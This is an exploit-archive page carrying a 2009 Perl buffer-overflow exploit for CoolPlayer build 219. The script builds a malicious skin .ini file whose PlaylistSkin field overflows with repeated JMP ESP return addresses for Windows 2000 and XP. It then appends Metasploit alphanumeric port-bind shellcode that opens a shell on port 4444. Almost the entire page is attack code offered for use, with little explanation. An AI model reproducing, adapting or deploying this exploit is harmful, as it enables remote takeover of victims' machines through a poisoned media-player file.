[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : CoolPlayer BUILD 219 (PlaylistSkin) Buffer Overflow Exploit
# Published : 2009-01-07
# Author : Jeremy Brown
# Previous Title : Cain & Abel 4.9.25 (Cisco IOS-MD5) Local Buffer Overflow Exploit
# Next Title : VUPlayer <= 2.49 .PLS Universal Buffer Overflow Exploit
#!/usr/bin/perl
# coolplayer_bof.pl
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
#
# CoolPlayer BUILD 219 'PlaylistSkin' Buffer Overflow Exploit
# http://coolplayer.sourceforge.net
#
# TCP 0.0.0.0:4444 0.0.0.0:0 LISTENING
#
# C:Documents and SettingsAdministrator> telnet localhost 4444
# .....
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# ANDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
#
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# Some fun, good 'ole win32 smashing.. bada-bing bada-boom!
$header = "[CoolPlayer Skin]nPlaylistSkin=";
$win2ksp4 = 0x77E4307B; # user32.dll JMP ESP
$winxpsp3 = 0x7E498C6B; # user32.dll JMP ESP
# Win32 Portbind Shellcode (pexalphanum/metasploit,port=4444)
$shellcode = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49" .
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36" .
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34" .
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41" .
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e" .
"x4dx34x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x36x4bx48" .
"x4ex46x46x32x46x42x4bx48x45x54x4ex33x4bx38x4ex37" .
"x45x30x4ax37x41x30x4fx4ex4bx38x4fx54x4ax41x4bx48" .
"x4fx35x42x32x41x50x4bx4ex49x34x4bx58x46x43x4bx58" .
"x41x30x50x4ex41x33x42x4cx49x49x4ex4ax46x48x42x4c" .
"x46x47x47x50x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e" .
"x46x4fx4bx53x46x55x46x32x4ax32x45x37x45x4ex4bx48" .
"x4fx35x46x52x41x30x4bx4ex48x46x4bx58x4ex30x4bx54" .
"x4bx58x4fx35x4ex51x41x50x4bx4ex43x50x4ex32x4bx38" .
"x49x58x4ex46x46x52x4ex31x41x56x43x4cx41x53x4bx4d" .
"x46x46x4bx58x43x44x42x33x4bx38x42x54x4ex30x4bx48" .
"x42x47x4ex51x4dx4ax4bx48x42x34x4ax50x50x35x4ax36" .
"x50x38x50x54x50x50x4ex4ex42x35x4fx4fx48x4dx48x56" .
"x43x55x48x56x4ax46x43x53x44x43x4ax36x47x57x43x57" .
"x44x33x4fx35x46x55x4fx4fx42x4dx4ax56x4bx4cx4dx4e" .
"x4ex4fx4bx53x42x55x4fx4fx48x4dx4fx45x49x38x45x4e" .
"x48x56x41x38x4dx4ex4ax50x44x30x45x45x4cx46x44x30" .
"x4fx4fx42x4dx4ax46x49x4dx49x50x45x4fx4dx4ax47x55" .
"x4fx4fx48x4dx43x55x43x55x43x55x43x55x43x45x43x44" .
"x43x35x43x54x43x55x4fx4fx42x4dx48x36x4ax46x41x31" .
"x4ex55x48x46x43x55x49x58x41x4ex45x59x4ax56x46x4a" .
"x4cx51x42x37x47x4cx47x35x4fx4fx48x4dx4cx56x42x51" .
"x41x35x45x45x4fx4fx42x4dx4ax56x46x4ax4dx4ax50x32" .
"x49x4ex47x35x4fx4fx48x4dx43x35x45x35x4fx4fx42x4d" .
"x4ax56x45x4ex49x34x48x48x49x44x47x45x4fx4fx48x4d" .
"x42x55x46x55x46x35x45x45x4fx4fx42x4dx43x59x4ax46" .
"x47x4ex49x57x48x4cx49x37x47x55x4fx4fx48x4dx45x45" .
"x4fx4fx42x4dx48x56x4cx56x46x56x48x46x4ax46x43x56" .
"x4dx36x49x58x45x4ex4cx56x42x45x49x45x49x42x4ex4c" .
"x49x38x47x4ex4cx36x46x44x49x38x44x4ex41x33x42x4c" .
"x43x4fx4cx4ax50x4fx44x54x4dx52x50x4fx44x44x4ex32" .
"x43x39x4dx38x4cx37x4ax43x4bx4ax4bx4ax4bx4ax4ax46" .
"x44x57x50x4fx43x4bx48x41x4fx4fx45x57x46x44x4fx4f" .
"x48x4dx4bx35x47x45x44x55x41x55x41x55x41x35x4cx56" .
"x41x50x41x55x41x45x45x35x41x45x4fx4fx42x4dx4ax56" .
"x4dx4ax49x4dx45x30x50x4cx43x35x4fx4fx48x4dx4cx36" .
"x4fx4fx4fx4fx47x53x4fx4fx42x4dx4bx38x47x55x4ex4f" .
"x43x48x46x4cx46x56x4fx4fx48x4dx44x55x4fx4fx42x4d" .
"x4ax56x4fx4ex50x4cx42x4ex42x56x43x35x4fx4fx48x4d" .
"x4fx4fx42x4dx5a";
$filename = $ARGV[0];
$target = $ARGV[1];
if(!defined($filename) || !defined($target))
{
print "Usage: $0 <filename.ini> [1=win2ksp4/2=winxpsp3]n";
}
if($target == "1") { $retaddr = pack('l', $win2ksp4); }
if($target == "2") { $retaddr = pack('l', $winxpsp3); }
$payload = $header . $retaddr x 377 . $shellcode; # 377 * 4 = 1508
open(FILE, '>' . $filename);
print FILE $payload;
close(FILE);
exit;
# www.Syue.com [2009-01-07]